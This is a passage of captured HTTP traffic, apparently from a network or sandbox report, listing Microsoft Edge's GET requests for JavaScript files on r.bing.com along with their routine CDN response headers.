x-ms-request-id: 6610645e-101e-002c-1bc2-1768ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=216560
expires: Fri, 06 Dec 2024 22:17:34 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12b2
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/n21aGRCN5EKHB3qObygw029dyNU.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/n21aGRCN5EKHB3qObygw029dyNU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:57:19 GMT
etag: 0x8DCDC66220B7293
content-length: 806
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: hRrTe9xFPcEQGLGPgVvjhw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 01ae1936-601e-0001-370e-16eb6d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=186773
expires: Fri, 06 Dec 2024 14:01:07 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12b3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/8CgcSSLayxEVUBf0swP_bQGMId8.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/8CgcSSLayxEVUBf0swP_bQGMId8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:52:56 GMT
etag: 0x8DCDC5D2377F40E
content-length: 156
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 0ApKmxnWdlgJ/r3VvxbmFQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4034a33d-301e-0074-22e3-176cd6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=366007
expires: Sun, 08 Dec 2024 15:48:21 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12b4
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/V_fBQ_iVmAgE_Ta_T-6BNXc0ZY4.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/V_fBQ_iVmAgE_Ta_T-6BNXc0ZY4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:29:34 GMT
etag: 0x8DCDC6241BA29EA
content-length: 368
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: xl2SFLZCQEcsZUNAUSfMmA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c72e3555-d01e-0057-4e3d-16031d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=307282
expires: Sat, 07 Dec 2024 23:29:36 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12b5
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/9xGNA8UskvA9WHF58zbLOHZ5HvI.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/9xGNA8UskvA9WHF58zbLOHZ5HvI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:55:43 GMT
etag: 0x8DCDC5D86C3D99C
content-length: 308
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: rimZQyGjXssDEnuSlgMaJA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 52c65f3b-c01e-0007-0c4e-181c15000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=339873
expires: Sun, 08 Dec 2024 08:32:47 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12b6
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/_2I169N92jVtSc_VEsV0nma5sRY.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/_2I169N92jVtSc_VEsV0nma5sRY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:36:19 GMT
etag: 0x8DCDC63331FF483
content-length: 312
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Ij6CMW7d9STrT+a4Nf7dFA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: cbc4fcef-801e-004f-35b8-162e88000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=297532
expires: Sat, 07 Dec 2024 20:47:06 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12b7
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/gKwIRAF4fg7noG1zyeUz8x3Jdhc.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/gKwIRAF4fg7noG1zyeUz8x3Jdhc.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:47:07 GMT
etag: 0x8DCDC64B5831289
content-length: 492
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: rSmdN6tN5TS/1yEQ8Z6pNA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7b418c73-801e-0022-3518-1684a6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=61901
expires: Thu, 05 Dec 2024 03:19:55 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12b8
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/zL4sntecq0RmP6dobtS9Rd5WRvU.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/zL4sntecq0RmP6dobtS9Rd5WRvU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:34:27 GMT
etag: 0x8DCE8C34C6E86D0
content-type: text/javascript; charset=utf-8
content-md5: 5WRb79OLEOB99g79FkaKhA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f66e2ec1-f01e-0004-15fe-1a1f12000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1541
vary: Accept-Encoding
cache-control: public, no-transform, max-age=87508
expires: Thu, 05 Dec 2024 10:26:42 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12bd
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/psgXZvzYJMEW2ydikIk493Va1d4.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/psgXZvzYJMEW2ydikIk493Va1d4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:02:01 GMT
etag: 0x8DCDC66CA2704F8
content-length: 635
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: cbryIH17LuJqgju0sWrerw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9c1a67be-101e-002c-19ab-1668ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=262714
expires: Sat, 07 Dec 2024 11:06:48 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12be
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rs/6v/x2/nj/nt6a1ZR520utsLoZmSYgwxdOPgI.js?or=w

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rs/6v/x2/nj/nt6a1ZR520utsLoZmSYgwxdOPgI.js?or=w HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 399
content-type: application/x-javascript; charset=utf-8
server: Kestrel
access-control-allow-headers: *
access-control-allow-origin: *
content-encoding: br
last-modified: Mon, 23 Sep 2024 23:58:56 GMT
x-eventid: 672daa4d8a124f619fd9efc8037a4750
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-as-instrumentationoptions: AppServerLoggingMaster=1
x-as-machinename: DUBEEAP0000E0B0
x-as-suppresssetcookie: 1
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-BXMwj/r+M5Dj2O/vYtKcEMIkmso4UZKkvFlrDQTVa8c='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
cache-control: public, max-age=115987
expires: Thu, 05 Dec 2024 18:21:21 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12bf
timing-allow-origin: *
GET

https://r.bing.com/rp/5L3iD467J3iJWEPwIjxlK0MMDpY.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/5L3iD467J3iJWEPwIjxlK0MMDpY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:41:54 GMT
etag: 0x8DCEC884215D06E
content-length: 772
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: yaTET5I1fmUKhVemn0wu5w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6927f078-601e-0067-1379-1e5937000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.60ba1302.1728944206.8e0aa639
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=258650
expires: Sat, 07 Dec 2024 09:59:04 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12c0
timing-allow-origin: *
GET

https://r.bing.com/rp/c-kfqLSd-OD-g3VtLKozRdXMO14.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/c-kfqLSd-OD-g3VtLKozRdXMO14.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:32:37 GMT
etag: 0x8DCE8C30A6A61DD
akamai-grn: 0.4c1a1202.1732697712.ca869222
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7058
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: /nrOcgcgG+7k8yxsmx1J4Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4805e060-e01e-005f-4dde-1a186e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=316699
expires: Sun, 08 Dec 2024 02:06:33 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12ca
timing-allow-origin: *
GET

https://r.bing.com/rp/K_V1CARn2Q2lTs5njJKUvUkHyi4.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/K_V1CARn2Q2lTs5njJKUvUkHyi4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:12:13 GMT
etag: 0x8DCDC5FD53B2D55
content-length: 140
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: zk7Mu+IZ+1Afv84KFZt8XQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 678b32bb-e01e-005f-480a-17186e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=213092
expires: Fri, 06 Dec 2024 21:19:46 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12cb
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/dUzSc2TJEdHviToK914Fg1aekPA.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/dUzSc2TJEdHviToK914Fg1aekPA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:32:36 GMT
etag: 0x8DCE8C30A28A766
content-length: 1707
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: MkbY3tM5BoIJgMyWXEttiw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 37709367-b01e-004c-3e4c-352d8f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.37421202.1731631657.2991352
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=381275
expires: Sun, 08 Dec 2024 20:02:49 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12cc
timing-allow-origin: *
GET

https://r.bing.com/rp/8LIV7VPMYjV_ya4Ggnu8LBWQIQQ.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/8LIV7VPMYjV_ya4Ggnu8LBWQIQQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:53:26 GMT
etag: 0x8DCDC5D351B0B64
content-length: 626
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 6Xn7G4GYLjqWVjZYfi42LQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 942ab205-401e-0070-59f5-179954000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=127549
expires: Thu, 05 Dec 2024 21:34:03 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12cd
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/JTnIefOMiNK7DX11D7RY8i0_PKc.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/JTnIefOMiNK7DX11D7RY8i0_PKc.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:10:36 GMT
etag: 0x8DCDC5F9B563C48
content-length: 168
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 10AmaEgXjFITcl8HP2hwyQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4146679f-101e-0027-3a22-1570d9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=248846
expires: Sat, 07 Dec 2024 07:15:40 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12ce
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/_Bf8WbhrPNleVJdfG-L0A8nld9c.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/_Bf8WbhrPNleVJdfG-L0A8nld9c.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:36:36 GMT
etag: 0x8DCDC633D5EAA6A
content-length: 282
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: ZsrYRIS4X28M0gd5bb2Heg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 81189a7e-d01e-0057-6fda-15031d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=124135
expires: Thu, 05 Dec 2024 20:37:09 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
